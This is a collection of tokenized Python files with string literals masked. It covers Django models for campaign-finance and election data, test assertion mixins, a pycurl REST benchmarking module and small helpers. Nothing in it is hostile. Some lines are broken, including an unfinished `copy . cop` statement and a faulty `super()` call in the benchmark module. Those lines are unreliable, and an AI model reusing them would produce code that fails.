display_political_orientation ( self ) : <EOL> p = self . political_orientation <EOL> if p == '<STR_LIT:D>' : <EOL> return "<STR_LIT>" <EOL> elif p == '<STR_LIT:R>' : <EOL> return "<STR_LIT>" <EOL> else : <EOL> return "<STR_LIT>" <EOL> def get_filtered_ie_url ( self ) : <EOL> return "<STR_LIT>" % ( self . fec_id ) <EOL> class ElectionSummary ( models . Model ) : <EOL> district = models . ForeignKey ( '<STR_LIT>' , editable = False ) <EOL> incumbent_name = models . 
CharField ( max_length = <NUM_LIT:255> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> incumbent_party = models . CharField ( max_length = <NUM_LIT:1> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> election_winner = models . ForeignKey ( '<STR_LIT>' , null = True , blank = True , help_text = "<STR_LIT>" ) <EOL> cycle = models . CharField ( max_length = <NUM_LIT:4> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> election_year = models . IntegerField ( help_text = "<STR_LIT>" ) <EOL> election_date = models . DateField ( null = True , help_text = "<STR_LIT>" ) <EOL> election_summary_code = models . CharField ( max_length = <NUM_LIT:2> , blank = True , null = True , choices = ELECTION_TYPE_CHOICES ) <EOL> has_primary_runoff = models . NullBooleanField ( default = False , help_text = "<STR_LIT>" ) <EOL> primary_runoff_date = models . DateField ( null = True , help_text = "<STR_LIT>" ) <EOL> primary_runoff_needed = models . NullBooleanField ( default = False , help_text = "<STR_LIT>" ) <EOL> has_general_runoff = models . NullBooleanField ( default = False , help_text = "<STR_LIT>" ) <EOL> general_runoff_date = models . DateField ( null = True , help_text = "<STR_LIT>" ) <EOL> general_runoff_needed = models . NullBooleanField ( default = False , help_text = "<STR_LIT>" ) <EOL> candidate_raised = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> candidate_spending = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> coordinated_spending = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> outside_spending = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> total_spending = models . 
DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> def __unicode__ ( self ) : <EOL> return "<STR_LIT>" % ( self . district , self . election_summary_code , self . district . incumbent_name , self . district . incumbent_party ) <EOL> class Election ( models . Model ) : <EOL> district = models . ForeignKey ( '<STR_LIT>' ) <EOL> election = models . ForeignKey ( '<STR_LIT>' ) <EOL> election_winner = models . ForeignKey ( '<STR_LIT>' , null = True ) <EOL> cycle = models . CharField ( max_length = <NUM_LIT:4> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> election_year = models . IntegerField ( help_text = "<STR_LIT>" ) <EOL> start_date = models . DateField ( null = True ) <EOL> election_date = models . DateField ( null = True , help_text = "<STR_LIT>" ) <EOL> election_code = models . CharField ( max_length = <NUM_LIT:2> , blank = True , null = True , choices = ELECTION_TYPE_CHOICES ) <EOL> election_other_description = models . CharField ( max_length = <NUM_LIT:20> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> is_contested = models . NullBooleanField ( default = False , help_text = "<STR_LIT>" ) <EOL> candidate_raised = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> candidate_spending = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> coordinated_spending = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> outside_spending = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> total_spending = models . 
DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> def __unicode__ ( self ) : <EOL> return_value = "<STR_LIT>" <EOL> if self . office == '<STR_LIT:S>' : <EOL> return_value = '<STR_LIT>' % ( self . state , self . term_class , self . election_year , self . election_code ) <EOL> else : <EOL> return_value = '<STR_LIT>' % ( self . state , self . office_district , self . election_year , self . election_code ) <EOL> return_value += "<STR_LIT>" % ( self . incumbent_name ) <EOL> return return_value <EOL> class Committee_Time_Summary ( models . Model ) : <EOL> com_id = models . CharField ( max_length = <NUM_LIT:9> , blank = True ) <EOL> com_name = models . CharField ( max_length = <NUM_LIT:255> , null = True , blank = True ) <EOL> filing_number = models . IntegerField ( null = True , blank = True , help_text = "<STR_LIT>" ) <EOL> tot_receipts = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , blank = True ) <EOL> tot_contrib = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , blank = True ) <EOL> tot_ite_contrib = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , blank = True ) <EOL> tot_non_ite_contrib = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , blank = True ) <EOL> tot_disburse = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , blank = True ) <EOL> ind_exp_mad = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , blank = True , help_text = "<STR_LIT>" ) <EOL> coo_exp_par = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , blank = True , help_text = "<STR_LIT>" ) <EOL> new_loans = models . 
DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , blank = True ) <EOL> outstanding_loans = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , blank = True , help_text = "<STR_LIT>" ) <EOL> electioneering_made = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , blank = True , help_text = "<STR_LIT>" ) <EOL> cash_on_hand_end = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , blank = True ) <EOL> coverage_from_date = models . DateField ( null = True ) <EOL> coverage_through_date = models . DateField ( null = True ) <EOL> data_source = models . CharField ( max_length = <NUM_LIT:10> , help_text = "<STR_LIT>" ) <EOL> def get_absolute_url ( self ) : <EOL> if self . filing_number : <EOL> return "<STR_LIT>" % ( self . filing_number ) <EOL> else : <EOL> url = "<STR_LIT>" % ( self . com_id ) <EOL> return url <EOL> def get_committee_url ( self ) : <EOL> return "<STR_LIT>" % ( slugify ( self . com_name ) , self . com_id ) <EOL> def get_skeda_url ( self ) : <EOL> if self . filing_number : <EOL> return "<STR_LIT>" % ( self . filing_number ) <EOL> else : <EOL> return None <EOL> def get_skedb_url ( self ) : <EOL> if self . filing_number : <EOL> return "<STR_LIT>" % ( self . filing_number ) <EOL> else : <EOL> return None <EOL> def get_fec_url ( self ) : <EOL> if self . filing_number : <EOL> url = "<STR_LIT>" % ( self . com_id , self . filing_number ) <EOL> return url <EOL> else : <EOL> url = "<STR_LIT>" % ( self . com_id ) <EOL> return url <EOL> def __unicode__ ( self ) : <EOL> return "<STR_LIT>" % ( self . com_name , self . coverage_from_date , self . coverage_through_date ) <EOL> class Authorized_Candidate_Committees ( models . Model ) : <EOL> cycle = models . CharField ( max_length = <NUM_LIT:4> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> candidate_id = models . 
CharField ( max_length = <NUM_LIT:9> , blank = True ) <EOL> committee_id = models . CharField ( max_length = <NUM_LIT:9> , blank = True ) <EOL> committee_name = models . CharField ( max_length = <NUM_LIT:255> ) <EOL> is_pcc = models . NullBooleanField ( null = True ) <EOL> com_type = models . CharField ( max_length = <NUM_LIT:1> , help_text = "<STR_LIT>" ) <EOL> ignore = models . BooleanField ( default = False , help_text = "<STR_LIT>" ) <EOL> """<STR_LIT>""" <EOL> class Filing_Gap ( models . Model ) : <EOL> committee_id = models . CharField ( max_length = <NUM_LIT:9> , blank = True ) <EOL> gap_start = models . DateField ( null = True ) <EOL> gap_end = models . DateField ( null = True ) <EOL> """<STR_LIT>""" <EOL> class Pac_Candidate ( models . Model ) : <EOL> cycle = models . CharField ( max_length = <NUM_LIT:4> , null = True , blank = True ) <EOL> committee = models . ForeignKey ( '<STR_LIT>' ) <EOL> candidate = models . ForeignKey ( '<STR_LIT>' ) <EOL> support_oppose = models . CharField ( max_length = <NUM_LIT:1> , <EOL> choices = ( ( '<STR_LIT:S>' , '<STR_LIT>' ) , ( '<STR_LIT:O>' , '<STR_LIT>' ) ) <EOL> ) <EOL> total_ind_exp = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> total_ec = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> total_coord_exp = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> class Meta : <EOL> ordering = ( '<STR_LIT>' , ) <EOL> def __unicode__ ( self ) : <EOL> return self . committee , self . candidate <EOL> def support_or_oppose ( self ) : <EOL> if ( self . support_oppose . upper ( ) == '<STR_LIT:O>' ) : <EOL> return '<STR_LIT>' <EOL> elif ( self . support_oppose . upper ( ) == '<STR_LIT:S>' ) : <EOL> return '<STR_LIT>' <EOL> return '<STR_LIT>' <EOL> class State_Aggregate ( models . Model ) : <EOL> cycle = models . 
CharField ( max_length = <NUM_LIT:4> , null = True , blank = True ) <EOL> state = models . CharField ( max_length = <NUM_LIT:2> , blank = True , null = True ) <EOL> expenditures_supporting_president = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> expenditures_opposing_president = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> total_pres_ind_exp = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> expenditures_supporting_house = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> expenditures_opposing_house = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> total_house_ind_exp = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> expenditures_supporting_senate = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> expenditures_opposing_senate = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> total_senate_ind_exp = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> total_ind_exp = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> recent_ind_exp = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> recent_pres_exp = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> total_ec = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> total_coord = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> def __unicode__ ( self ) : <EOL> return STATE_CHOICES [ self . 
state ] <EOL> def get_absolute_url ( self ) : <EOL> return "<STR_LIT>" % ( self . state ) <EOL> class DistrictWeekly ( models . Model ) : <EOL> district = models . ForeignKey ( '<STR_LIT>' ) <EOL> start_date = models . DateField ( null = True ) <EOL> end_date = models . DateField ( null = True , help_text = "<STR_LIT>" ) <EOL> cycle_week_number = models . IntegerField ( null = True , blank = True , help_text = "<STR_LIT>" ) <EOL> coordinated_spending = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> outside_spending = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> total_spending = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> objects = models . Manager ( ) <EOL> nulls_last_objects = NullsLastManager ( ) <EOL> class roi_pair ( models . Model ) : <EOL> committee = models . ForeignKey ( '<STR_LIT>' ) <EOL> candidate = models . ForeignKey ( '<STR_LIT>' ) <EOL> support_oppose = models . CharField ( max_length = <NUM_LIT:1> , <EOL> choices = ( ( '<STR_LIT:S>' , '<STR_LIT>' ) , ( '<STR_LIT:O>' , '<STR_LIT>' ) ) <EOL> ) <EOL> total_ind_exp = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> def show_support_oppose ( self ) : <EOL> if self . support_oppose . upper ( ) == '<STR_LIT:S>' : <EOL> return '<STR_LIT>' <EOL> elif self . support_oppose . upper ( ) == '<STR_LIT:O>' : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return '<STR_LIT>' <EOL> def verdict ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . candidate . cand_is_gen_winner == None : <EOL> return "<STR_LIT>" <EOL> if self . candidate . cand_is_gen_winner == True : <EOL> if self . support_oppose . upper ( ) == '<STR_LIT:S>' : <EOL> return '<STR_LIT>' <EOL> elif self . support_oppose . 
upper ( ) == '<STR_LIT:O>' : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return "<STR_LIT>" <EOL> if self . candidate . cand_is_gen_winner == False : <EOL> if self . support_oppose . upper ( ) == '<STR_LIT:S>' : <EOL> return '<STR_LIT>' <EOL> elif self . support_oppose . upper ( ) == '<STR_LIT:O>' : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return "<STR_LIT>" <EOL> return "<STR_LIT>" </s>
<s> from django . contrib import messages <EOL> from django . contrib . messages . storage . base import Message <EOL> from django . core import mail <EOL> from django . http import HttpResponseRedirect , HttpResponsePermanentRedirect <EOL> class StatusCodeAssertionsMixin ( object ) : <EOL> redirect_codes = [ <EOL> HttpResponseRedirect . status_code , <EOL> HttpResponsePermanentRedirect . status_code <EOL> ] <EOL> def assert_status_equal ( self , response , status_code_or_response ) : <EOL> status_code = self . _get_status_code ( status_code_or_response ) <EOL> self . assertEqual ( <EOL> response . status_code , <EOL> status_code , <EOL> '<STR_LIT>' . format ( <EOL> response . status_code , <EOL> status_code , <EOL> ) <EOL> ) <EOL> def assert_status_in ( self , response , status_codes_or_responses ) : <EOL> status_codes = list ( map ( self . _get_status_code , status_codes_or_responses ) ) <EOL> self . assertIn ( <EOL> response . status_code , <EOL> status_codes , <EOL> '<STR_LIT>' . format ( <EOL> response . status_code , <EOL> '<STR_LIT:U+002CU+0020>' . join ( str ( code ) for code in status_codes ) , <EOL> ) <EOL> ) <EOL> def _get_redirect_assertion_message ( self , response ) : <EOL> return '<STR_LIT>' . format ( <EOL> response . status_code <EOL> ) <EOL> def assert_redirect ( self , response , expected_url = None ) : <EOL> """<STR_LIT>""" <EOL> self . assertIn ( <EOL> response . status_code , <EOL> self . redirect_codes , <EOL> self . _get_redirect_assertion_message ( response ) , <EOL> ) <EOL> if expected_url : <EOL> location_header = response . _headers . get ( '<STR_LIT:location>' , None ) <EOL> self . assertEqual ( <EOL> location_header , <EOL> ( '<STR_LIT>' , str ( expected_url ) ) , <EOL> '<STR_LIT>' . format ( <EOL> expected_url , <EOL> location_header [ <NUM_LIT:1> ] , <EOL> ) <EOL> ) <EOL> def assert_not_redirect ( self , response ) : <EOL> self . assertNotIn ( <EOL> response . status_code , <EOL> self . redirect_codes , <EOL> self . 
_get_redirect_assertion_message ( response ) <EOL> ) <EOL> def _get_status_code ( self , status_code_or_response ) : <EOL> try : <EOL> return status_code_or_response . status_code <EOL> except AttributeError : <EOL> return status_code_or_response <EOL> class EmailAssertionsMixin ( object ) : <EOL> def assert_emails_in_mailbox ( self , count ) : <EOL> self . assertEqual ( <EOL> len ( mail . outbox ) , <EOL> count , <EOL> '<STR_LIT>' . format ( <EOL> len ( mail . outbox ) , <EOL> count , <EOL> ) <EOL> ) <EOL> def _is_email_matching_criteria ( self , email , ** kwargs ) : <EOL> for key , value in kwargs . items ( ) : <EOL> if getattr ( email , key ) != value : <EOL> return False <EOL> return True <EOL> def assert_email ( self , email , ** kwargs ) : <EOL> for key , value in kwargs . items ( ) : <EOL> self . assertEqual ( <EOL> getattr ( email , key ) , <EOL> value , <EOL> '<STR_LIT>' . format ( <EOL> key , <EOL> value , <EOL> getattr ( email , key ) , <EOL> ) <EOL> ) <EOL> def assert_email_exists ( self , ** kwargs ) : <EOL> for email in mail . outbox : <EOL> if self . _is_email_matching_criteria ( email , ** kwargs ) : <EOL> return <EOL> raise AssertionError ( '<STR_LIT>' ) <EOL> class MessagesAssertionsMixin ( object ) : <EOL> def assert_messages_sent ( self , request , count ) : <EOL> sent = len ( messages . get_messages ( request ) ) <EOL> self . assertEqual ( <EOL> sent , <EOL> count , <EOL> '<STR_LIT>' . format ( <EOL> sent , <EOL> count , <EOL> ) <EOL> ) <EOL> def assert_message_exists ( self , request , level , message ) : <EOL> self . assertIn ( <EOL> Message ( level = level , message = message ) , <EOL> messages . get_messages ( request ) , <EOL> '<STR_LIT>' <EOL> ) <EOL> class _InstanceContext ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , enter_assertion , exit_assertion , model_class , ** kwargs ) : <EOL> self . enter_assertion = enter_assertion <EOL> self . exit_assertion = exit_assertion <EOL> self . 
model_class = model_class <EOL> self . kwargs = kwargs <EOL> def __enter__ ( self ) : <EOL> self . enter_assertion ( self . model_class , ** self . kwargs ) <EOL> return self <EOL> def __exit__ ( self , exc_type , exc_value , traceback ) : <EOL> self . exit_assertion ( self . model_class , ** self . kwargs ) <EOL> return True <EOL> class InstanceAssertionsMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> def assert_instance_exists ( self , model_class , ** kwargs ) : <EOL> try : <EOL> obj = model_class . _default_manager . get ( ** kwargs ) <EOL> self . assertIsNotNone ( obj ) <EOL> except model_class . DoesNotExist : <EOL> raise AssertionError ( '<STR_LIT>' . format ( <EOL> model_class . __name__ , <EOL> ) <EOL> ) <EOL> def assert_instance_does_not_exist ( self , model_class , ** kwargs ) : <EOL> try : <EOL> instance = model_class . _default_manager . get ( ** kwargs ) <EOL> raise AssertionError ( '<STR_LIT>' . format ( <EOL> model_class . __name__ , <EOL> instance , <EOL> ) ) <EOL> except model_class . DoesNotExist : <EOL> pass <EOL> def assert_instance_created ( self , model_class , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return _InstanceContext ( <EOL> self . assert_instance_does_not_exist , <EOL> self . assert_instance_exists , <EOL> model_class , <EOL> ** kwargs <EOL> ) <EOL> def assert_instance_deleted ( self , model_class , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return _InstanceContext ( <EOL> self . assert_instance_exists , <EOL> self . assert_instance_does_not_exist , <EOL> model_class , <EOL> ** kwargs <EOL> ) <EOL> class CompleteAssertionsMixin ( <EOL> StatusCodeAssertionsMixin , <EOL> EmailAssertionsMixin , <EOL> MessagesAssertionsMixin , <EOL> InstanceAssertionsMixin , <EOL> ) : <EOL> pass </s>
<s> from django . conf . urls import url , include <EOL> urlpatterns = ( <EOL> url ( r'<STR_LIT>' , include ( '<STR_LIT>' ) ) , <EOL> ) </s>
<s> import math <EOL> import json <EOL> import pycurl <EOL> import sys <EOL> from . import tests <EOL> from . tests import Test <EOL> from . import parsing <EOL> from . parsing import * <EOL> if sys . version_info [ <NUM_LIT:0> ] > <NUM_LIT:2> : <EOL> from past . builtins import basestring <EOL> from . import six <EOL> from . six import binary_type <EOL> from . six import text_type <EOL> """<STR_LIT>""" <EOL> METRICS = { <EOL> '<STR_LIT>' : pycurl . NAMELOOKUP_TIME , <EOL> '<STR_LIT>' : pycurl . CONNECT_TIME , <EOL> '<STR_LIT>' : pycurl . APPCONNECT_TIME , <EOL> '<STR_LIT>' : pycurl . PRETRANSFER_TIME , <EOL> '<STR_LIT>' : pycurl . STARTTRANSFER_TIME , <EOL> '<STR_LIT>' : pycurl . REDIRECT_TIME , <EOL> '<STR_LIT>' : pycurl . TOTAL_TIME , <EOL> '<STR_LIT>' : pycurl . SIZE_DOWNLOAD , <EOL> '<STR_LIT>' : pycurl . SIZE_UPLOAD , <EOL> '<STR_LIT>' : pycurl . REQUEST_SIZE , <EOL> '<STR_LIT>' : pycurl . SPEED_DOWNLOAD , <EOL> '<STR_LIT>' : pycurl . SPEED_UPLOAD , <EOL> '<STR_LIT>' : pycurl . REDIRECT_COUNT , <EOL> '<STR_LIT>' : pycurl . NUM_CONNECTS <EOL> } <EOL> AGGREGATES = { <EOL> '<STR_LIT>' : <EOL> lambda x : float ( sum ( x ) ) / float ( len ( x ) ) , <EOL> '<STR_LIT>' : <EOL> lambda x : float ( sum ( x ) ) / float ( len ( x ) ) , <EOL> '<STR_LIT>' : <EOL> lambda x : <NUM_LIT:1.0> / ( sum ( [ <NUM_LIT:1.0> / float ( y ) for y in x ] ) / float ( len ( x ) ) ) , <EOL> '<STR_LIT>' : lambda x : median ( x ) , <EOL> '<STR_LIT>' : lambda x : std_deviation ( x ) , <EOL> '<STR_LIT>' : lambda x : sum ( x ) , <EOL> '<STR_LIT>' : lambda x : sum ( x ) <EOL> } <EOL> OUTPUT_FORMATS = [ u'<STR_LIT>' , u'<STR_LIT>' ] <EOL> def median ( array ) : <EOL> """<STR_LIT>""" <EOL> mysorted = [ x for x in array ] <EOL> mysorted . 
sort ( ) <EOL> middle = int ( len ( mysorted ) / <NUM_LIT:2> ) <EOL> if len ( mysorted ) % <NUM_LIT:2> == <NUM_LIT:0> : <EOL> return float ( ( mysorted [ middle ] + mysorted [ middle - <NUM_LIT:1> ] ) ) / <NUM_LIT:2> <EOL> else : <EOL> return mysorted [ middle ] <EOL> def std_deviation ( array ) : <EOL> """<STR_LIT>""" <EOL> if not array or len ( array ) == <NUM_LIT:1> : <EOL> return <NUM_LIT:0> <EOL> average = AGGREGATES [ '<STR_LIT>' ] ( array ) <EOL> variance = map ( lambda x : ( x - average ) ** <NUM_LIT:2> , array ) <EOL> try : <EOL> len ( variance ) <EOL> except TypeError : <EOL> variance = list ( variance ) <EOL> stdev = AGGREGATES [ '<STR_LIT>' ] ( variance ) <EOL> return math . sqrt ( stdev ) <EOL> class Benchmark ( Test ) : <EOL> """<STR_LIT>""" <EOL> warmup_runs = <NUM_LIT:10> <EOL> benchmark_runs = <NUM_LIT:100> <EOL> output_format = u'<STR_LIT>' <EOL> output_file = None <EOL> metrics = set ( ) <EOL> raw_metrics = set ( ) <EOL> aggregated_metrics = dict ( ) <EOL> def ninja_copy ( self ) : <EOL> """<STR_LIT>""" <EOL> output = Benchmark ( ) <EOL> myvars = vars ( self ) <EOL> output . __dict__ = myvars . copy ( ) <EOL> return output <EOL> def add_metric ( self , metric_name , aggregate = None ) : <EOL> """<STR_LIT>""" <EOL> clean_metric = metric_name . lower ( ) . strip ( ) <EOL> if clean_metric . lower ( ) not in METRICS : <EOL> raise Exception ( "<STR_LIT>" + metric_name + <EOL> "<STR_LIT>" ) <EOL> self . metrics . add ( clean_metric ) <EOL> if not aggregate : <EOL> self . raw_metrics . add ( clean_metric ) <EOL> elif aggregate . lower ( ) . strip ( ) in AGGREGATES : <EOL> clean_aggregate = aggregate . lower ( ) . strip ( ) <EOL> current_aggregates = self . aggregated_metrics . get ( <EOL> clean_metric , list ( ) ) <EOL> current_aggregates . append ( clean_aggregate ) <EOL> self . 
aggregated_metrics [ clean_metric ] = current_aggregates <EOL> else : <EOL> raise Exception ( "<STR_LIT>" + aggregate + <EOL> "<STR_LIT>" ) <EOL> return self <EOL> def __init__ ( self ) : <EOL> self . metrics = set ( ) <EOL> self . raw_metrics = set ( ) <EOL> self . aggregated_metrics = dict ( ) <EOL> super ( Benchmark , self ) . __init__ ( ) <EOL> def __str__ ( self ) : <EOL> return json . dumps ( self , default = safe_to_json ) <EOL> def realize_partial ( self , context = None ) : <EOL> """<STR_LIT>""" <EOL> if not self . is_dynamic ( ) : <EOL> return self <EOL> if self . is_context_modifier ( ) : <EOL> return self <EOL> else : <EOL> copyout = copy . cop <EOL> pass <EOL> def configure_curl ( self , timeout = tests . DEFAULT_TIMEOUT , context = None , curl_handle = None ) : <EOL> curl = super ( ) . configure_curl ( self , timeout = timeout , <EOL> context = context , curl_handle = curl_handle ) <EOL> curl . setopt ( pycurl . FORBID_REUSE , <NUM_LIT:1> ) <EOL> return curl <EOL> def parse_benchmark ( base_url , node ) : <EOL> """<STR_LIT>""" <EOL> node = lowercase_keys ( flatten_dictionaries ( node ) ) <EOL> benchmark = Benchmark ( ) <EOL> benchmark = Test . parse_test ( base_url , node , benchmark ) <EOL> for key , value in node . items ( ) : <EOL> if key == u'<STR_LIT>' : <EOL> benchmark . warmup_runs = int ( value ) <EOL> elif key == u'<STR_LIT>' : <EOL> benchmark . benchmark_runs = int ( value ) <EOL> elif key == u'<STR_LIT>' : <EOL> format = value . lower ( ) <EOL> if format in OUTPUT_FORMATS : <EOL> benchmark . output_format = format <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' + format ) <EOL> elif key == u'<STR_LIT>' : <EOL> if not isinstance ( value , basestring ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> benchmark . output_file = value <EOL> elif key == u'<STR_LIT>' : <EOL> if isinstance ( value , basestring ) : <EOL> benchmark . add_metric ( tests . 
coerce_to_string ( value ) ) <EOL> elif isinstance ( value , list ) or isinstance ( value , set ) : <EOL> for metric in value : <EOL> if isinstance ( metric , dict ) : <EOL> for metricname , aggregate in metric . items ( ) : <EOL> if not isinstance ( metricname , basestring ) : <EOL> raise TypeError ( <EOL> "<STR_LIT>" ) <EOL> if not isinstance ( aggregate , basestring ) : <EOL> raise TypeError ( <EOL> "<STR_LIT>" ) <EOL> benchmark . add_metric ( tests . coerce_to_string ( metricname ) , <EOL> tests . coerce_to_string ( aggregate ) ) <EOL> elif isinstance ( metric , basestring ) : <EOL> benchmark . add_metric ( tests . coerce_to_string ( metric ) ) <EOL> elif isinstance ( value , dict ) : <EOL> for metricname , aggregate in value . items ( ) : <EOL> if not isinstance ( metricname , basestring ) : <EOL> raise TypeError ( <EOL> "<STR_LIT>" ) <EOL> if not isinstance ( aggregate , basestring ) : <EOL> raise TypeError ( <EOL> "<STR_LIT>" ) <EOL> benchmark . add_metric ( tests . coerce_to_string ( metricname ) , <EOL> tests . coerce_to_string ( aggregate ) ) <EOL> else : <EOL> raise TypeError ( <EOL> "<STR_LIT>" + str ( value ) ) <EOL> return benchmark </s>
<s> </s>
<s> from setuptools import setup , find_packages <EOL> version = '<STR_LIT>' <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = version , <EOL> description = '<STR_LIT>' , <EOL> keywords = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> install_requires = [ '<STR_LIT>' , ] , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> package_dir = { '<STR_LIT>' : '<STR_LIT:src>' } , <EOL> packages = [ '<STR_LIT>' ] , <EOL> include_package_data = True , <EOL> ) </s>
<s> def get_or_create ( model , ** kwargs ) : <EOL> from sqlalchemy . orm . exc import NoResultFound <EOL> try : <EOL> return model . query . filter_by ( ** kwargs ) . one ( ) <EOL> except NoResultFound : <EOL> return model ( ** kwargs ) <EOL> def make_list ( str_or_list ) : <EOL> '''<STR_LIT>''' <EOL> if isinstance ( str_or_list , basestring ) : <EOL> return [ str_or_list , ] <EOL> return str_or_list </s>
<s> import requests <EOL> from templates . text import TextTemplate <EOL> def process ( input , entities = None ) : <EOL> output = { } <EOL> try : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> data = r . json ( ) <EOL> output [ '<STR_LIT:input>' ] = input <EOL> output [ '<STR_LIT>' ] = TextTemplate ( data [ '<STR_LIT>' ] + '<STR_LIT>' + data [ '<STR_LIT>' ] ) . get_message ( ) <EOL> output [ '<STR_LIT:success>' ] = True <EOL> except : <EOL> output [ '<STR_LIT:success>' ] = False <EOL> return output </s>
